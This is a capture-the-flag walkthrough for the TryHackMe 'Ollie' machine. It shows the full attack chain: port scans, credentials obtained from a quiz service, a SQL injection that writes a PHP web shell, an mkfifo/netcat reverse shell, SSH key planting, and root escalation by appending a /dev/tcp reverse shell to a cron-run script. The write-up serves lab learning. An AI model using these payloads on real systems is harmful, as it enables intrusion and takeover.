Ollie (SQLI, Permission)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  nmap -A 10.10.20.38 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-16 14:50 +0630
Nmap scan report for 10.10.20.38
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /immaolllieeboyyy
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Ollie :: login
|_Requested resource was http://10.10.20.38/index.php?page=login
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.78 seconds

Rustscan result show me all open ports.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  rustscan -a 10.10.20.38 | tee rust.log

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
1337/tcp open  waste   syn-ack

When i answer random question on port 1337, i got some credentials.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  nc 10.10.20.38 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.

What is your name? mrhnl
What's up, Mrhnl! It's been a while. What are you here for? getsystem
Ya' know what? Mrhnl. If you can answer a question about me, I might have something for you.


What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? duck
You are wrong! I'm sorry, but this is serious business. Let's try again...


What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? wolf
You are wrong! I'm sorry, but this is serious business. Let's try again...


What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.

                    Username: admin

                    Password: OllieUnixMontgomery!

PS: Good luck and next time bring some treats!

When I login using this creds on http://10.10.20.38, I successfully login.

After this, we will see the admin dashboard.

Here is the article for poc https://fluidattacks.com/advisories/mercury/. You can read ubuntu version through SQLI.

Check if user have read or write access. You will see all is Y.

" union all select 1,2,3,group_concat(user,0x3a,file_priv) from mysql.user -- -

Write evil php on the system. We got error, it is still ok.

" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/rev.php' -- -

We can check our RCE is success or not?

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  curl http://10.10.20.38/rev.php\?cmd\=whoami
1	 www-data
 	3	4

Get a shell from victim using mkfifo.

curl http://10.10.20.38/rev.php\?cmd\=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.9.0.180%209001%20%3E%2Ftmp%2Ff

In netcat session, we got reverse shell.

We found user.txt on /home/ollie. The only one we got is permission error.

$ cat user.txt
cat: user.txt: Permission denied

We can move to ollie user, with the password that we seen in previous task.

$ su ollie
Password: OllieUnixMontgomery!

whoami
ollie

Which stable shell, we generate ssh key and write on victim.

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHmsE/qACwaksUEoBvDE4wFu0/N5eZeNQEX9upOp8Bh4KTZsUcMqo7OSdztZbvkSwwp0S6C3mk9WLioJbQ2dDFC64ZyT/LUAgNZgZkSRZtufQa9lhUgqNYhg/0oT1juH5rGTJhoGa8MROpRhp/LiKXw8g4wOQggrG+xqrnCG84PCcb0bq73XW7XMYN9koLXokwl3GSlX/AkSn3VWgBcnj73IX2eI2yvYSAzckYyWeu9fR6EX/j8Rfj3Z7Tsy0W4iuhHwSGPJHX8yDms9Sx07nQmMGGKW+RmQ6p1dqDt9g/R1L2aXDJLJnZOGzR4ZqdxFpyl3R/R026HXKyeSCSAvaE34GIzBowe6g9K4h/Ewe3zwIBlLW8TGq7L7EBPR2j6d2yYSbniH3GMio88N+vmF4E919gMMlgMqi4fJOhoy/l++4vuBqKAEpGEcywblNLw4YSe59dSBurrFeTNrC3O6CNyO8GyDtQ3wxNOGI7nMe7yOesabNTdz9qDRXdbpyXDwE= hnl@hnl" > /home/ollie/.ssh/authorized_keys

Let's login ssh using private key.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  ssh -i /home/hnl/.ssh/id_rsa ollie@10.10.20.38
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 16 Apr 2022 09:45:56 AM UTC

  System load:  0.45              Processes:                141
  Usage of /:   64.4% of 9.78GB   Users logged in:          0
  Memory usage: 45%               IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                IPv4 address for eth0:    10.10.20.38


6 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Feb 12 15:57:44 2022
ollie@hackerdog:~$

Nothing is interesting. So, we will check using pspy64, linpeas.

wget http://10.9.0.180:1234/linpeas

We can see suspicious process like feedme.

2022/04/16 10:00:00 CMD: UID=0    PID=73809  | /lib/systemd/systemd-udevd 
2022/04/16 10:00:00 CMD: UID=0    PID=73808  | /lib/systemd/systemd-udevd 
2022/04/16 10:00:39 CMD: UID=0    PID=73812  | ps -e -o pid,ppid,state,command 
2022/04/16 10:01:01 CMD: UID=0    PID=73814  | /lib/systemd/systemd-udevd 
2022/04/16 10:01:01 CMD: UID=0    PID=73813  | (feedme) 
2022/04/16 10:01:01 CMD: UID=0    PID=73824  | /lib/systemd/systemd-udevd 
2022/04/16 10:01:01 CMD: UID=0    PID=73823  | /lib/systemd/systemd-udevd

Find this file.

ollie@hackerdog:/tmp$ find / -type f -name feedme 2>/dev/null
/usr/bin/feedme
ollie@hackerdog:/tmp$ cat /usr/bin/feedme
#!/bin/bash

# This is weird?

Who own this file?

ollie@hackerdog:/tmp$ ls -lisha /usr/bin/feedme
10256 4.0K -rwxrw-r-- 1 root ollie 30 Feb 12 02:31 /usr/bin/feedme

Inject it.

ollie@hackerdog:/tmp$ echo "bash -i >& /dev/tcp/10.9.0.180/9002 0>&1" >> /usr/bin/feedme
ollie@hackerdog:/tmp$ cat /usr/bin/feedme 
#!/bin/bash

# This is weird?
bash -i >& /dev/tcp/10.9.0.180/9002 0>&1

In netcat session, we got reverse shell.

PreviousInsekube (Kubernetes)NextTech_Supp0rt: 1 (Decoding, SubrionCMS, iconv)

Last updated 3 years ago